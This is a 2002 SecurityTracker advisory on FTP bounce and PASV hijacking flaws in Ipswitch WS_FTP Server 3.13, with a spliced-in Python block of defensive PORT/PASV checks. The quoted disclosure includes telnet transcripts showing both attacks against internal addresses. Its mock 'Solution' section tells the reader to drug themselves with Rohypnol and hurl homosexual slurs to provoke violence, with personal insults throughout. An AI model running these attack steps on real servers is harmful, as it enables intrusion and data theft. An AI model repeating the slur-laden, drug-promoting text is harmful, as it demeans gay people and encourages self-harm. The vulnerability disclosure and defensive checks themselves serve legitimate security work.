SecurityTracker.com
Category:   Application (File Transfer/Sharing)  >   WS_FTP Vendors:   Ipswitch
Ipswitch WS_FTP Server Allows Remote Users to Hijack Connections And Conduct Bounce Attacks Via the FTP Server
SecurityTracker Alert ID:  1005486
SecurityTracker URL:  http://securitytracker.com/id/1005486
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Oct 25 2002
Impact:   Host/resource access via network, User access via network
Exploit Included:  Yes  
Version(s): 3.13
Description:   Two vulnerabilities were reported in the Ipswitch WS_FTP server. A remote user may be able to hijack valid FTP connections. A remote user can also attack other hosts via the FTP server.

It is reported that a remote user can attempt to hijack FTP sessions when FTP PASV mode is used. Normally, when a remote client requests an FTP PASV connection, the FTP server opens a listening port for the data connection and tells the client its number. If a remote user connects to that port before the legitimate client does, the remote user receives the data connection and can hijack the transfer.

A remote user can also employ an "FTP bounce attack" to cause the FTP server to create a connection to any IP address on any TCP port greater than 1024. If the target FTP server is located behind a firewall, for example, the remote user may be able to gain access to ostensibly protected hosts.

This bounce attack method has been well known for many years and is discussed in a CERT advisory from December 1997:

http://www.cert.org/advisories/CA-1997-27.html
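As an added example (not code from the advisory, the CERT document or Ipswitch), here are the two server-side checks that close the holes described above, together with the h1,h2,h3,h4,p1,p2 address arithmetic that PORT commands and 227 PASV replies use; the client and peer addresses are constructed for illustration.

```python
# Added example: server-side validation of PORT targets (anti-bounce) and of
# PASV data-connection peers (anti-hijack). Addresses below are constructed.
import ipaddress
import re

_HOSTPORT = re.compile(r"(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})")


def parse_hostport(arg):
    """Decode the h1,h2,h3,h4,p1,p2 form shared by PORT and the 227 PASV reply.
    The port is p1 * 256 + p2, so 31,144 is 8080 and 4,23 is 1047."""
    m = _HOSTPORT.search(arg)
    if not m:
        raise ValueError("malformed host-port string")
    octets = [int(x) for x in m.groups()]
    if any(o > 255 for o in octets):
        raise ValueError("octet out of range")
    host = ".".join(str(o) for o in octets[:4])
    port = octets[4] * 256 + octets[5]
    return host, port


def check_port_command(arg, control_peer_ip):
    """Anti-bounce rule: the server may only open the data connection back to
    the host that owns the control connection, and only on an unprivileged port.
    Returns (allowed, reason)."""
    host, port = parse_hostport(arg)
    if ipaddress.ip_address(host) != ipaddress.ip_address(control_peer_ip):
        return False, "PORT host does not match control connection peer"
    if port < 1024:
        return False, "PORT target is a privileged port"
    return True, "ok"


def accept_pasv_data_connection(data_peer_ip, control_peer_ip):
    """Anti-hijack rule: a connection arriving on the PASV listening port is
    accepted only from the address that issued the PASV command."""
    return ipaddress.ip_address(data_peer_ip) == ipaddress.ip_address(control_peer_ip)


if __name__ == "__main__":
    client = "203.0.113.5"  # constructed address of the FTP client
    print(check_port_command("192,168,1,20,31,144", client))  # bounce attempt: rejected
    print(check_port_command("203,0,113,5,31,144", client))   # client's own host: allowed
    print(accept_pasv_data_connection("198.51.100.9", client))  # foreign host on PASV port: False
```

Rejecting PORT targets other than the client's own address also blocks legitimate third-party (server-to-server) transfers, which is the trade-off the CERT advisory discusses.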

Some demonstration exploit transcripts are provided in the Source Message.

The vendor has reportedly been notified.

Impact:   A remote user can make connections to arbitrary hosts via the FTP server. This can be used to attack hosts located behind firewalls.

A remote user can hijack PASV FTP connections, gaining access to directory listings and files from other users.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.ipswitch.com/support/WS_FTP-Server/patch-upgrades.html
Cause:   Access control error, State error
Underlying OS:  Windows (NT), Windows (2000), Windows (XP)

Message History:   None.


 Source Message Contents

Subject:  [VulnWatch] IPSwitch, Inc. WS_FTP Server





Product:   IPSwitch, Inc. WS_FTP Server
Versions:  v3.13 (dated 2002.08.07), possibly others.
Severity:  Medium-Hot


Author:    low halo <lowhalo@hushmail.com>
Date:      October 25th, 2002
Revision:  1.0




{ Overview }

    WS_FTP v3.13 by IPSwitch, Inc., is vulnerable to the classic FTP bounce
attack as well as PASV connection hijacking.



{ Impact }

    The FTP bounce vulnerability allows a remote attacker to cause the FTP
server to create a connection to any IP address on any TCP port greater than
1024.  Thus, the attacker can scan Internet addresses anonymously along with
any internal addresses that the FTP server has access to.  More information
on this vulnerability can be found here:
        http://www.cert.org/advisories/CA-1997-27.html.
    The PASV connection hijacking vulnerability allows a remote attacker to
intercept directory listings and file downloads from other users; file uploads
may also be spoofed.  No authentication is necessary to execute this attack.
More information on this vulnerability can be found here:
        http://www.kb.cert.org/vuls/id/2558.



{ Details }

    This demonstrates the FTP bounce vulnerability.  The internal IP address,
"192.168.1.20", is listening on port 8080, and "192.168.2.30" is dead or not
accessible via port 8080:

$ telnet x.ternal.ip.address 21
Trying x.ternal.ip.address...
Connected to x.ternal.ip.address.
Escape character is '^]'.
220-lh1 X2 WS_FTP Server 3.1.3.EVAL (696969696)
220-Sun Jun 04 00:00:00 1989
220-27 days remaining on evaluation.
220 lh1 X2 WS_FTP Server 3.1.3.EVAL (969696969)
USER lowhalo
331 Password required
PASS el_ach
230 user logged in
PORT 192,168,1,20,31,144
200 command successful
LIST
150 Opening ASCII data connection for directory listing
226 transfer complete
PORT 192,168,2,30,31,144
200 command successful
LIST
425 Can't open data connection.


This demonstrates the PASV connection hijacking vulnerability:

$ telnet x.x.x.x 21
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
220-lh1 X2 WS_FTP Server 3.1.3.EVAL (696969696)
220-Sun Jun 04 00:00:00 1989
220-27 days remaining on evaluation.
220 lh1 X2 WS_FTP Server 3.1.3.EVAL (969696969)
USER lowhalo
331 Password required
PASS el_ach
230 user logged in
PASV
227 Entering Passive Mode (192,168,1,1,4,23).
LIST
150 Opening ASCII data connection for directory listing


Next, from another IP address:

$ telnet x.x.x.x 1047
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
drwxr-x---  2 lowhalo     System            0 Jan  0 00:00 .
drwxr-x---  2 lowhalo     System            0 Jan  0 00:00 ..
-rwxr-x---  1 lowhalo     System         1337 Jan  0 00:00 lh
Connection closed by foreign host.



{ Solution }

    1.)  Mix yourself a Long Island Iced Tea.
    2.)  Buy more Rohypnol from Paco on 7th & 30th ('cuz you used up the
          box you bought last time to get yourself out of that chicken-
          suit bind last Wednesday, remember??).
    3.)  While you're not looking, slip yourself two (2) crushed 100mg pills.
    4.)  Drink your Long Island while pretending to be flirting with someone
          in a bar environment (but in fact, you're still in your lonely,
          lonely apartment because you're a fucking looser and you're gonna
          die alone 28 years from now).
    5.)  Put on those crotchless leather pants that you got in your closet.
          But this time, don't wear anything underneath.  Not even
          underwear.
    6.)  Go to the local gay bar, even though you're not gay, and wait
          outside 'till that warm fuzzy roofies feeling starts crawling up
          your back.
    7.)  Go inside the bar and look for the menacing black biker guy named
          Steve (Hey, how did you know his name is Steve if you're not
          gay, huh??).  Take the deepest breath you can and scream at the
          top of your lungs every homosexual slur that you can think of
          right in the guy's face.
    8.)  Wake up 16 hours later at the bottom of a ditch in a pool of your
          own blood with that, "uh-oh, I think I forgot my jacket at the
          bar" feeling.
    9.)  Try to figure out exactly what happened, and LAUGH YOUR ASS OFF
          when you do.
    10.) Die alone 28 years from now, you fucking looser.


    (Yeah, so anyways, IPSwitch never got back to me after two weeks, so
    there is no solution to this problem.)


{ Conclusion }

    A big huge shout-out goes to HACKTIVISMO (http://www.hacktivismo.com/)!!
You guys have a lot to be proud of.

    And here's a quote I'd like all those iDEFENSE research contributors to
read:

        "Few men have the virtue to withstand the highest bidder."
            - George Washington




        low halo <lowhalo@hushmail.com>
        Defender of Truth and Liberty

        http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x9BFD99BF
        58CE 3215 226A 69ED 4D20  4044 C925 54F9 9BFD 99BF

